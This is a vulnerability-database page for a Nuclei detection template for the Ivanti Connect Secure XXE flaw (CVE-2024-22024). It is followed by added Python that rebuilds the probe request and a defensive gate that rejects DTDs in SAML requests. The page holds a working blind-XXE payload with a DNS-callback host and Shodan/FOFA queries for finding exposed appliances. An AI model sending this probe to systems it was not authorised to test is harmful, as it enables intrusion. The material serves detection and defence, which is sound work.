nuclei / ProjectDiscovery / NUCLEI:CVE-2024-22024
History: Feb 09, 2024 - 7:59 a.m.

Ivanti Connect Secure - XXE

Published: 2024-02-09 07:59:13 / ProjectDiscovery / github.com
Keywords: ivanti, connect secure, xxe, xml external entity, unauthorized access, remote code execution, security patches, updates, watchtowr, cve-2024-22024, exploit, sensitive information, interactsh-url, samlrequest, dns interaction, http, post, saml, vendor, product

CVSS3: 8.3 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: CHANGED
  Confidentiality Impact: LOW
  Integrity Impact: LOW
  Availability Impact: LOW
  Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

AI Score: 8.4 High (Confidence: High)

EPSS: 0.006 Low (Percentile: 78.4%)

Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection. The Nuclei template below exercises it through the SAMLRequest parameter of /dana-na/auth/saml-sso.cgi: it POSTs a base64-encoded XML document whose DTD declares an external parameter entity pointing at an interactsh host, and it reports a hit only when a DNS interaction is observed and the response body contains both '/dana-na/' and 'WriteCSS' (matchers-condition: and).

id: CVE-2024-22024

info:
  name: Ivanti Connect Secure - XXE
  author: watchTowr
  severity: high
  description: |
    Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
  remediation: |
    Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
  reference:
    - https://labs.watchtowr.com/are-we-now-part-of-ivanti/
    - https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
  metadata:
    max-request: 1
    vendor: ivanti
    product: connect_secure
    shodan-query:
      - "html:\"welcome.cgi?p=logo\""
      - http.title:"ivanti connect secure"
      - http.html:"welcome.cgi?p=logo"
    fofa-query:
      - body="welcome.cgi?p=logo"
      - title="ivanti connect secure"
    google-query: intitle:"ivanti connect secure"
  tags: cve,cve2024,xxe,ivanti
variables:
  payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
    "http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'

http:
  - raw:
      - |
        POST /dana-na/auth/saml-sso.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SAMLRequest={{base64(payload)}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '/dana-na/'
          - 'WriteCSS'
        condition: and
# digest: 490a00463044022064dfea002db32f325d2a6eb8b2611463d76db7ac1f5dfd008ad98fc469f8af9102202351431f37385f4819eda1fc126a5f723e1c525b7a99a88c5628f5f0a53e45a9:922c64590222798bb761d5b6d8e72950
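The following Python is an added example, not part of the Nuclei template, the watchTowr write-up or any Ivanti code. It rebuilds the probe the template sends so the request and the matcher logic can be inspected offline: the blind-XXE document, the raw HTTP request, and the same and-combined matchers. The template writes the base64 value into the form body as-is; this example percent-encodes it so that any '+', '/' or '=' in the base64 survives form decoding on the server. Host names (vpn.example.test, abc123.oast.example) and the sample response body are placeholders constructed for the example.

```python
import base64
import urllib.parse

SINK_PATH = "/dana-na/auth/saml-sso.cgi"   # path used by the template above
BODY_MARKERS = ("/dana-na/", "WriteCSS")    # the template's body matcher words


def build_payload(callback_host: str) -> str:
    """Blind XXE probe with the same shape as the template's `payload` variable.

    The DTD declares an external *parameter* entity and references it at once,
    so a parser that processes the internal subset fetches the URL before it
    looks at any element content. Nothing is exfiltrated; the DNS lookup for
    callback_host is the only signal.
    """
    return (
        '<?xml version="1.0" ?>'
        '<!DOCTYPE root [<!ENTITY % watchTowr SYSTEM '
        f'"http://{callback_host}/x"> %watchTowr;]><r></r>'
    )


def build_request(hostname: str, callback_host: str) -> bytes:
    """Raw HTTP/1.1 request equivalent to the template's `raw` block.

    In an application/x-www-form-urlencoded body a literal '+' decodes to a
    space, so the base64 value is percent-encoded here; after form decoding
    the server sees exactly the base64 string that was produced.
    """
    b64 = base64.b64encode(build_payload(callback_host).encode("utf-8")).decode("ascii")
    body = urllib.parse.urlencode({"SAMLRequest": b64})
    head = (
        f"POST {SINK_PATH} HTTP/1.1\r\n"
        f"Host: {hostname}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
    )
    return (head + body).encode("ascii")


def server_side_view(request: bytes) -> str:
    """What the CGI obtains after form-decoding and base64-decoding the field."""
    body = request.split(b"\r\n\r\n", 1)[1].decode("ascii")
    field = urllib.parse.parse_qs(body)["SAMLRequest"][0]
    return base64.b64decode(field).decode("utf-8")


def template_matches(response_body: str, interaction_protocols: list[str]) -> bool:
    """Mirror of the template's matchers (matchers-condition: and).

    The interactsh protocol matcher ("dns") and both body words must all hit;
    a login page that echoes the markers without any callback is not a hit.
    """
    dns_seen = "dns" in interaction_protocols
    body_ok = all(marker in response_body for marker in BODY_MARKERS)
    return dns_seen and body_ok


if __name__ == "__main__":
    # Constructed data, not a capture from a real appliance.
    req = build_request("vpn.example.test", "abc123.oast.example")
    assert server_side_view(req) == build_payload("abc123.oast.example")
    sample_body = '<html><script src="/dana-na/js/x.js"></script><script>WriteCSS()</script></html>'
    print(template_matches(sample_body, ["dns"]))   # True
    print(template_matches(sample_body, []))        # False: no callback observed
```

The probe carries no payload body of its own; the DNS interaction on the callback host is the evidence, which is why the DNS matcher is mandatory and the body markers alone (present on any Connect Secure login page) never suffice.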
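The defender's side of the same request, as an added example that is not from the template, watchTowr or Ivanti. A SAML endpoint never legitimately receives a DTD, so inbound SAMLRequest values are decoded the way the endpoint would decode them (plain base64 for the HTTP-POST binding, raw-DEFLATE for HTTP-Redirect) and refused before any XML parser sees a DOCTYPE. The byte-level gate also catches internal-entity expansion, which an "external entities off" parser setting does not. All sample messages, the placeholder hosts and the `_b64`/`_raw_deflate` helpers are constructed for this example.

```python
import base64
import binascii
import re
import urllib.parse
import zlib
import xml.etree.ElementTree as ET

# Any DOCTYPE or ENTITY declaration, whatever the case. This catches the
# external-parameter-entity probe above and also internal-entity expansion
# ("billion laughs"), which no external-entity switch addresses.
DTD_RE = re.compile(rb"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def decode_saml_param(value: str) -> bytes:
    """Base64-decode a SAMLRequest; accept the raw-DEFLATE form of the
    HTTP-Redirect binding as well as the plain form of the HTTP-POST binding."""
    try:
        raw = base64.b64decode(value)
    except (binascii.Error, ValueError) as exc:
        raise ValueError("SAMLRequest is not valid base64") from exc
    if raw.startswith(b"<"):          # plain XML: first byte is '<'
        return raw
    try:
        return zlib.decompress(raw, -15)  # -15: raw DEFLATE stream, no zlib header
    except zlib.error as exc:
        raise ValueError("SAMLRequest is neither XML nor DEFLATE-compressed XML") from exc


def parse_saml_request(value: str) -> ET.Element:
    """Decode, gate on the bytes, then parse.

    The gate is parser-independent: it does not depend on how the deployed XML
    library is configured, and it yields an explicit audit event instead of a
    library-specific failure (or a silent outbound fetch).
    """
    doc = decode_saml_param(value)
    hit = DTD_RE.search(doc)
    if hit:
        raise ValueError(f"DTD rejected at byte {hit.start()}: {hit.group(0).decode('ascii', 'replace')}")
    return ET.fromstring(doc)


def triage(form_bodies: list[str]) -> list[tuple[int, str]]:
    """Run captured application/x-www-form-urlencoded bodies through the gate.

    Returns (body index, reason) for every rejected SAMLRequest value.
    """
    findings = []
    for idx, body in enumerate(form_bodies):
        for value in urllib.parse.parse_qs(body).get("SAMLRequest", []):
            try:
                parse_saml_request(value)
            except (ValueError, ET.ParseError) as exc:
                findings.append((idx, str(exc)))
    return findings


def _b64(data: bytes) -> str:
    return base64.b64encode(data).decode("ascii")


def _raw_deflate(data: bytes) -> bytes:
    co = zlib.compressobj(9, zlib.DEFLATED, -15)
    return co.compress(data) + co.flush()


# Constructed samples; host names are placeholders.
BENIGN_XML = (
    b'<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" '
    b'ID="_c0ffee" Version="2.0" IssueInstant="2024-02-09T07:59:13Z">'
    b'<saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">'
    b'https://sp.example.test</saml:Issuer></samlp:AuthnRequest>'
)
XXE_PROBE_XML = (  # same shape as the template's payload variable
    b'<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM '
    b'"http://abc123.oast.example/x"> %watchTowr;]><r></r>'
)
LAUGHS_XML = (  # internal entities only; still rejected by the gate
    b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY a "aaaa"><!ENTITY b "&a;&a;&a;&a;">]><r>&b;</r>'
)
SAMPLE_BODIES = [
    "SAMLRequest=" + urllib.parse.quote(_b64(BENIGN_XML), safe=""),
    "SAMLRequest=" + urllib.parse.quote(_b64(_raw_deflate(BENIGN_XML)), safe=""),
    "SAMLRequest=" + urllib.parse.quote(_b64(XXE_PROBE_XML), safe=""),
    "SAMLRequest=" + urllib.parse.quote(_b64(LAUGHS_XML), safe=""),
]

if __name__ == "__main__":
    for idx, reason in triage(SAMPLE_BODIES):
        print(f"body {idx}: {reason}")
```

Both benign bodies parse; bodies 2 and 3 are rejected with the offset and the offending declaration, which is the event a WAF rule or application log should emit for this sink while the vendor patch is rolled out.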
